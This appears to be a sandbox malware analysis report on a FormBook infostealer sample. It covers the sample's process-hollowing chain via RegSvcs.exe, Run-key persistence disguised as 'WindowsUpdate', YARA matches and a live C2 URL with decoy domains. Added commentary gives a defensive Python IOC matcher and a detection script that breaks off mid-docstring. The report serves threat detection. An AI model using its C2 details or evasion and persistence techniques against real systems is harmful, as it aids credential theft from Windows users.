Windows Analysis Report
M1Y6kc9FpE.exe

Overview

General Information

Sample name: M1Y6kc9FpE.exe (renamed because original name is a hash value)
Original sample name: a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9.exe
Analysis ID: 1549399
MD5: 7d8165e194302250d880425b1608e307
SHA1: 2688c9a6a3946fd7d93fd861c5f94c0dd67ae593
SHA256: a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • M1Y6kc9FpE.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\M1Y6kc9FpE.exe" MD5: 7D8165E194302250D880425B1608E307)
    • wscript.exe (PID: 7876 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7968 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 8040 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 7988 cmdline: "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • oxhvi.msc (PID: 8084 cmdline: oxhvi.msc bvqmcwxut.docx MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 3360 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 1220 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
              • ipconfig.exe (PID: 3780 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
                • cmd.exe (PID: 7508 cmdline: /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • rundll32.exe (PID: 5336 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
              • oxhvi.msc.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC MD5: 0ADB9B817F1DF7807576C2D7068DD931)
                • RegSvcs.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • RegSvcs.exe (PID: 1548 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • netsh.exe (PID: 1508 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • netsh.exe (PID: 5472 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • oxhvi.msc.exe (PID: 1796 cmdline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC MD5: 0ADB9B817F1DF7807576C2D7068DD931)
                • RegSvcs.exe (PID: 2768 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • RegSvcs.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • cmmon32.exe (PID: 2940 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
              • cmmon32.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
              • oxhvi.msc.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC MD5: 0ADB9B817F1DF7807576C2D7068DD931)
                • RegSvcs.exe (PID: 2100 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • RegSvcs.exe (PID: 636 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • control.exe (PID: 7776 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
              • autofmt.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)
      • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7352 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
{"C2 list": ["www.ybokiesite.online/o52o/"], "decoy": ["ckroom.xyz", "apanstock.online", "6dtd8.vip", "phone-in-installment-kz.today", "ichaellee.info", "mpresamkt38.online", "ivein.today", "78cx465vo.autos", "avannahholcomb.shop", "eochen008.top", "rcraft.net", "eth-saaae.buzz", "ifxz.info", "flegendarycap50.online", "reon-network.xyz", "ee.zone", "ameralife.net", "5en4.shop", "eal-delivery-34026.bond", "anion.app", "avada-ga-17.press", "inlinlong.top", "eal-estate-90767.bond", "opesclosetyork.net", "gormendonca.online", "ackyard-fence-grants.today", "acuum-cleaner-84638.bond", "martdataclient.sbs", "1r1f9bnfo4s4.top", "66hf918cz.autos", "lush-diamond.info", "ome-decor-10002.bond", "onceng77gacor.xyz", "ake-money-online-34699.bond", "wen-paaac.buzz", "mewtcp.xyz", "alyk.cloud", "overedplans.net", "igurisland-cruise-deals.today", "niverse-tech.net", "indseniorjob881.click", "rostitutkivladimiraslap.net", "inecraftpuro.net", "ames666.xyz", "arehouse-inventory-62571.bond", "infeng01.xyz", "jg-bw.app", "y09ypy.pro", "uratool.net", "4hamnghi.online", "j2g.xyz", "ental-health-54823.bond", "teplero.shop", "01595.xyz", "xs5.buzz", "elationship-coach-44953.bond", "heiritforum.buzz", "lladinco.online", "heheartofthehome.net", "uantumcircles.world", "ork-in-usa-60761.bond", "tonic.cafe", "agaglobalcapital.net", "eusvexk.shop"]}
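The configuration block above is what the extractor pulled from the FormBook payload: one real C2 URL and a list of decoy domains the bot also contacts to hide the real server. The following is an added example, not part of the Joe Sandbox report, showing how a practitioner would turn that block into hunting indicators and run them over DNS query names. It copies the C2 entry and an abbreviated subset of the decoy list from the page; the DNS log lines are constructed. One observation drives the decoy matching: many decoy strings on the page look as if their first character is missing ("ichaellee.info", "inecraftpuro.net", "rostitutkivladimiraslap.net"), so the code treats them as one-character-short strings rather than exact hostnames. That interpretation is an assumption, not something the report states.

```python
"""IOC handling for the FormBook configuration extracted above.

Added example, not part of the Joe Sandbox report. Parses the extractor's
JSON (C2 list + decoy list), normalises the C2 URL into host/path, and
classifies DNS query names against both tiers.
"""
import json
from urllib.parse import urlsplit

# Copied from the report's extracted configuration; decoy list abbreviated.
CONFIG_JSON = json.dumps({
    "C2 list": ["www.ybokiesite.online/o52o/"],
    "decoy": ["ckroom.xyz", "apanstock.online", "ichaellee.info", "rcraft.net",
              "ee.zone", "inecraftpuro.net", "rostitutkivladimiraslap.net"],
})

# Constructed DNS log lines (not from the report): "<ts> <client> <qname>".
DNS_LOG = """\
2024-11-05T15:57:20 192.168.2.8 www.ybokiesite.online
2024-11-05T15:57:21 192.168.2.8 michaellee.info
2024-11-05T15:57:22 192.168.2.8 minecraftpuro.net
2024-11-05T15:57:23 192.168.2.8 coffee.zone
2024-11-05T15:57:24 192.168.2.8 login.microsoftonline.com
"""


def parse_config(raw):
    """Return (c2_indicators, decoy_hosts) from the extractor's JSON."""
    cfg = json.loads(raw)
    c2 = []
    for entry in cfg.get("C2 list", []):
        # The extractor emits scheme-less "host/path/"; urlsplit needs a scheme.
        parts = urlsplit(entry if "://" in entry else "http://" + entry)
        c2.append({"host": parts.hostname.lower(), "path": parts.path,
                   "url": entry})
    decoys = [d.lower().strip(".") for d in cfg.get("decoy", [])]
    return c2, decoys


def classify_qname(qname, c2, decoys):
    """'c2', 'decoy' or None for one DNS query name."""
    q = qname.lower().rstrip(".")
    for ind in c2:
        # Exact host or a subdomain of it.
        if q == ind["host"] or q.endswith("." + ind["host"]):
            return "c2"
    for d in decoys:
        # Assumption: decoy strings are missing exactly one leading character,
        # so accept the string as given or with one character prepended.
        # This is tighter than a plain suffix match ("coffee.zone" must not
        # match "ee.zone") but still yields "fee.zone" as a false positive.
        if q == d or (len(q) == len(d) + 1 and q[1:] == d):
            return "decoy"
    return None


def scan_dns_log(log, raw_config):
    """Return {qname: tier} for every query that matched, in log order."""
    c2, decoys = parse_config(raw_config)
    hits = {}
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname = line.split()
        tier = classify_qname(qname, c2, decoys)
        if tier:
            hits[qname] = tier
    return hits


if __name__ == "__main__":
    for name, tier in scan_dns_log(DNS_LOG, CONFIG_JSON).items():
        print(f"{tier:5s} {name}")
```

The C2 entry keeps its path ("/o52o/") because FormBook's beacon goes to that specific URI, which is the indicator to use on the proxy side; the decoy hosts are only useful for DNS-level hunting, and their count (64 in this config) makes the false-positive trade-off of the one-character rule worth noting before adding them to a blocklist.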
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docx | JoeSecurity_AutoitInjector | Yara detected Autoit Injector | Joe Security
C:\Users\user\AppData\Local\Temp\RarSFX0\bvqmcwxut.docx | JoeSecurity_AutoitInjector | Yara detected Autoit Injector | Joe Security

Source | Rule | Description | Author | Strings
00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
(301 further entries not shown)
Source | Rule | Description | Author | Strings
15.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
15.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
15.2.RegSvcs.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
15.2.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.RegSvcs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
(5 further entries not shown)

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7876, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 7968, ProcessName: cmd.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4084, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 5336, ProcessName: rundll32.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: oxhvi.msc bvqmcwxut.docx, CommandLine: oxhvi.msc bvqmcwxut.docx, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7988, ParentProcessName: cmd.exe, ProcessCommandLine: oxhvi.msc bvqmcwxut.docx, ProcessId: 8084, ProcessName: oxhvi.msc
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: oxhvi.msc bvqmcwxut.docx, ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, ParentProcessId: 8084, ParentProcessName: oxhvi.msc, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", ProcessId: 3360, ProcessName: RegSvcs.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, CommandLine: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4084, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, ProcessId: 7596, ProcessName: oxhvi.msc.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, ProcessId: 8084, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:57:23.745966+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-05T15:57:45.888405+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.8 | 58145 | TCP
2024-11-05T15:57:47.301900+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.8 | 58146 | TCP
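The process tree and the Sigma hits above describe one chain: a WinRAR SFX drops into Temp\RarSFX0, wscript.exe runs the .vbe, cmd.exe launches a PE renamed to oxhvi.msc with a .docx-named AutoIt script as its argument, that loader starts RegSvcs.exe from Temp and hollows it, the payload injects into explorer.exe and spawns SysWOW64 LOLBins (rundll32.exe with no arguments, netsh.exe, ipconfig.exe), and persistence is an HKCU/HKLM Run value "WindowsUpdate" pointing at NTFS 8.3 short names under Temp\qbmt. The block below is an added example, not part of the Joe Sandbox report, showing how the behavioural checks behind those Sigma hits look as code. The events are constructed Sysmon-style records (EventID 1 process creation, EventID 13 registry value set) that mirror the Sigma "Data:" lines on this page, plus one constructed benign control; the rule names, thresholds and the Sysmon field layout are assumptions for illustration.

```python
"""Detection logic for the execution chain in this report.

Added example, not part of the Joe Sandbox report. EVENTS are constructed
Sysmon-style records (EventID 1 = process creation, EventID 13 = registry
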